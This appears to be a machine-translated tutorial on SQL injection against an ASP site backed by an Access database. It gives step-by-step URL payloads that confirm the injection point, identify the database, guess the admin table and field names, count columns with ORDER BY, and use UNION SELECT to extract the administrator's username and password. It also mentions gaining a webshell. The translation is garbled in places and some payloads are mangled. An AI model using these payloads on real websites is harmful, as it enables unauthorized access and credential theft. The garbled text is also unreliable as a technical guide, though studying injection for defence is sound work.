A series of Web Attack and Defense Tutorials: Access Injection

With the birth of a series of new Internet products such as social networks and microblogs, the Web-based Internet applications are becoming more and more extensive, and enterprise information platforms are, for example, most enterprise websites, employee OA systems, and email systems are deployed on Web platforms. The rapid development of the Web has also aroused the strong attention of hackers, highlighting the Web security threats. Hackers exploit vulnerabilities in Web programs, for example, you can obtain Web control permissions by means of SQL injection, file upload, and cross-site access. You can tamper with the webpage content and steal important internal data. This article provides a detailed explanation of common SQL injection attacks.

SQL Injection is short for SQL Injection. Most of the implementation process is through Web browsers or other hacker tools. SQL Injection does not seem to have any difference on the surface, because the process is as if you typed the website domain name, wrote down the characters, and then press enter, but the danger may have already occurred.

To put it simply, SQL injection is a vulnerability in which an application transmits the structured query language (structured query language) query to the background database, if attackers are able to influence the query, SQL injection is triggered. Attackers can modify the syntax and functions of SQL by influencing the content passed to the database, and affect the functions and flexibility of the database and Operating System Supported by SQL. SQL injection is not just a vulnerability that affects Web applications. For any code that never obtains input from a source, if this input is used to construct a dynamic SQL statement, then it is likely to be attacked.

Currently, there are five common Internet injections divided by database structure.

A. Access Injection

B. Mssql Injection

C. Mysql Injection

D. Oracle Injection

E. Sysbase Injection

F. Other database Injection

Next, Let's explain how asp injection implements attacks.

Access injection Overview

Asp injection is also complicated. To put it simply, asp injection can be combined with an access database. When an injection point is obtained, there is no permission level, but asp can also be combined with an Mssql database, there are three injection points in this case.

1. Public

2. Db_owner

3. SA

These three permissions are briefly described as follows: the public permission is the smallest. In the face of such injection points, you can list and fields to obtain the Administrator account password. the db_owner permission is larger than the public permission, after obtaining the absolute path of the website, you can back up the permission to obtain the Webshell of the target website (with the permission of a website). The sa permission is the largest, and the full name is (System Admin ), simply put, this type of permission is equivalent to the administrator in windows. It can be seen how dangerous such injection is.

Access Injection

Web application languages provide programmable methods to interact with databases, such as data queries. Under this condition, if the Web developer cannot ensure that the user has been well processed when the input parameters and received values are passed to the database for query, injection usually occurs, if the attacker can control the statements sent to the database for query, the database will parse the data into code During query and resolution, and the attacker will be able to obtain the data he wants for the database query.

Determine whether Access has been injected

Before learning injection, set IE browser as follows.

Tools → Internet Options → advanced → Show http information of friends

Remove the check mark before the http information of the displayed friend and confirm the result. The first step is a success. This is because if you do not remove the check box, any website error may be an http500 error and no more detailed information will be obtained on the webpage. The specific operations are shown in Figure 1 and figure 2.

 
Figure 1

Figure 2

After the configuration is complete, open the local asp Web application environment to test the injection vulnerability.

Example 1 http: // 192.168.205.128/news. asp? Id = 50' we add single quotation marks after this address, and the server will return the following error message, as shown in 3:

Microsoft JET Database Engine error '80040e14'

Syntax error (operator loss) in the query expression 'id <50.

/News. asp, line 84

Figure 3

The error result shows several important information:

1. The website uses an Access database to connect to the database through the JET engine.

2. The table queried by this SQL statement has a field named ID.

3. The program did not determine whether the user entered the content is legal

4. The injection is a digital injection.

Therefore, we can see that the principle of SQL injection is simply to submit special code from the client to collect information about programs, databases, and servers.

Of course, it is not a good way to test whether it is an injection point. The IIS of each server returns a specific error message to the client. If parameters or the like are added to the program, SQL injection will not succeed, but the server may also report an error. The specific prompt information is: an error occurred while processing the URL. Contact the system administrator, as shown in figure 4.

Figure 4

Second, some programmers who have a little knowledge about SQL Injection think that it is safe to filter out single quotes. This is not a minority case. If you use single quotes for testing, the injection points cannot be tested. So what test method is more accurate? The answer is as follows:

1 http: // 192.168.205.128/news. asp? Id = 50

2 http: // 192.168.205.128/news. asp? Id = 50 and 1 = 1

3 http: // 192.168.205.128/news. asp? Id = 50 and 1 = 2

In this case, the SQL statement becomes the SELECT * FROM table WHERE id = 50

The following is an example:

This is the data. mdb table of a database, as shown in Figure 5:

Open one of the tables. For example, the id gmadmin gmpass is displayed on the Right of gmadmin, which is called a field. Then each corresponding field has corresponding data.

Figure 5

Therefore, this code is easy to understand.

SELECT * FROM table WHERE id = 50

Find a specific field from the table. the id of the field is 50, and then find the corresponding value.

Let's take a look at the test injection situation:

SELECT * FROM news WHERE id = 50 and 1 = 1 condition is true, because 1 is indeed equal to 1

SELECT * FROM news WHERE id = 50 and 1 = 2 condition is false, because 1 is not equal to 2

Test what the web pages are like by using these two statements. First, let's take a look at the original page without any parameters, as shown in 6.

Http: // 192.168.205.128/news. asp? Id = 50

Figure 6

Use the first test statement: http: // 192.168.205.128/news. asp? Id = 50 and 1 = 1

We know that 1 = 1. Therefore, after this statement is put in, the normal original page should still be returned, as shown in 7.

 
Figure 7

Use the second test statement: http: // 192.168.205.128/news. asp? Id = 50 and 1 = 2

We know that 1 is not equal to 2, so when we open this connection, the database query will display data that is different from the actual query statement, as shown in 8.

Figure 8

This determines whether the injection vulnerability exists.

Access Injection

When you can determine that a url is an injection point, you can do more and get the desired data based on the injection point. How can we get the data? Now we start to learn more advanced methods.

1. Determine what database is used for the current Web, starting with the difference between Access and Mssql. Both Access and Mssql have their own system tables, such as tables that store all objects in the database. Access is in the system table [msysobjects, however, when reading the table in the Web environment, the system prompts "no permission". Mssql is in the table [sysobjects] and can be read normally in the Web environment.
Run this statement, as shown in figure 9.

Http: // 192.168.205.128/news. asp? Id = 50and % 20 (select % 20 count (*) % 20 from % 20 msysobjects)> 0

 

Figure 9

2. After confirming that the database is accessed, you must start to guess the database content. The first thing you want is the administrator's account and password. Before that, you must first understand that the account and password must be stored in a field in the table. The first thing to do is to guess which table the account and password are stored in. First, the account and password fields are represented by * (asterisk). Then, the test injection statement above should be able to think that, if guessed correctly, the content displayed in the url is normal, otherwise, the system reports an error.

Run this statement. Expected result 10 is displayed.

Http: // 192.168.205.128/news. asp? Id = 50% 20and % 20 exists % 20 (select % 20 count (*) % 20 from % 20 admin)

Figure 10

The displayed result is Microsoft JET Database Engine error '80040e37' (the Microsoft Jet Database Engine cannot find the input table or query 'admin '. Check whether it exists and whether its name is correctly spelled .) /News. asp, line 84

Since the admin table cannot be found, the database does not have this table. Change the table to guess. Expected result 11 is displayed.

Http: // 192.168.205.128/news. asp? Id = 50% 20and % 20 exists % 20 (select % 20 count (*) % 20 from % 20 gmadmin)

Figure 11

After the execution is complete, no exception is displayed. It is the same as browsing the page normally, indicating that the gmadmin table exists in the database.

3. After you have guessed the table, continue to guess the fields in the table. The account password is stored in the field. This will first guess that the account field is password.

The statement should be as follows:

And (select count (username) from gmadmin)> 0

And (select count (password) from gmadmin)> 0

In practice, execute the following two statements, and the results are 12 and 13 respectively.

Http: // 192.168.205.128/news. asp? Id = 50% 20and % 20 (select % 20 count (username) % 20 from % 20 gmadmin)> 0

Http: // 192.168.205.128/news. asp? Id = 50% 20and % 20 (select % 20 count (password) % 20 from % 20 gmadmin)> 0

Figure 12

Figure 13

After execution, the original normal page is not returned. In this case, the field may not be username or password. Then, try gmadmin and gmpass as the account and password fields.

Run the following statement. The result is shown in figure 14 and Figure 15, respectively.

Http: // 192.168.205.128/news. asp? Id = 50% 20and % 20 (select % 20 count (gmadmin) % 20 from % 20 gmadmin)> 0

Http: // 192.168.205.128/news. asp? Id = 50% 20and % 20 (select % 20 count (gmpass) % 20 from % 20 gmadmin)> 0

Figure 14

Figure 15

This time, both statements return a normal page, indicating that the field is correctly guessed.

4. If we get the field and the table, we can get the final data only when there is one difference, because we call http: // 192.168.205.128/news. asp? Id = 50

New. asp is called later. Let's take a look at the source code first.

<%

Dim rs2

Dim rs2_numRows

Set rs2 = Server. CreateObject ("ADODB. Recordset ")

Rs2.ActiveConnection = MM_conn1_STRING

Rs2.Source = "SELECT * FROM news WHERE id <" + Replace (rs2 _ MMColParam ,"'","''")

Rs2.CursorType = 0

Rs2.CursorLocation = 2

Rs2.LockType = 1

Rs2.Open ()

Rs2_numRows = 0

%>

In the middle part, SELECT * FROM news WHERE id description is written. This http: // 192.168.205.128/news. asp? Id = 50 is used to call the new table segment. Therefore, we must obtain several fields in the new table.

Execute the following statement:
Http: // 192.168.205.128/news. asp? Id = 50% 20and % 201 = 2% 20 union % 20 select %, from % 20 gmadmin

Why do we keep writing from 1 to 12? This is a step-by-step test. At the beginning, http: // 192.168.205.128/news. asp is used? Id = 50 and1 = 2 union select1from gmadmin. After opening this page, we find that the page is not a normal page and continue the test. The page is still an error page, as shown in 16.

And1 = 2 union select1, 2 from gmadmin

And1 = 2 union select1, 2, 3 from gmadmin

And1 = 2 union select1, 2, 3, 4 from gmadmin

 
Figure 16

And so on. At last 12, the page is displayed normally, as shown in 17.

 
Figure 17

Now you can obtain the correct number of fields to crack the account and password content.

At this time, the page (17) shows numbers, such as 2, 3, 12, and 4. These numbers mean where the data content will pop up.

Run the statement. Expected result 18 is displayed. Http: // 192.168.205.128/news. asp? Id = 50% 20and % 201 = 2% 20 union % 20 select % ,,2, gmadmin, gmpass % 20 from % 20 gmadmin

 
Figure 18

Then, the final data content is obtained. However, you may think that

And1 = 2 union select1, 2 from gmadmin

And1 = 2 union select1, 2, 3 from gmadmin

And1 = 2 union select1, 2, 3, 4 from gmadmin

In this way, it will be very slow and difficult to guess, so you need to find a solution. Please refer to the following tips.

Access Injection

There are many skills available for asp injection. Here we will talk about the problems encountered in this article.

Tip 1

When determining the number of final fields, you can use order by directly at the beginning to explore the path.

After executing the following statement, open the page and find that the page is normal, as shown in 19.

Http: // 192.168.205.128/news. asp? Id = 50 order by 10

 
Figure 19

Continue, as shown in 20. Http: // 192.168.205.128/news. asp? Id = 50 order by 13

 
Figure 20

If a page error is found, the value following order by may be less than 13. Otherwise, the page will not go wrong.

Continue the test, as shown in Result 21. Http://www.bkjia.com/news. asp? Id = 50 order by 12

 
Figure 21

The page is displayed normally, so the correct one is http: // 192.168.205.128/news. asp? Id = 50 order by 12

Tip 2:

After determining the number of fields, you do not need to use the following statements to test the field. You can directly guess the number of fields, as shown in Figure 22.

 

Figure 22

After an error is guessed, continue to change the field to guess until the correct one is guessed.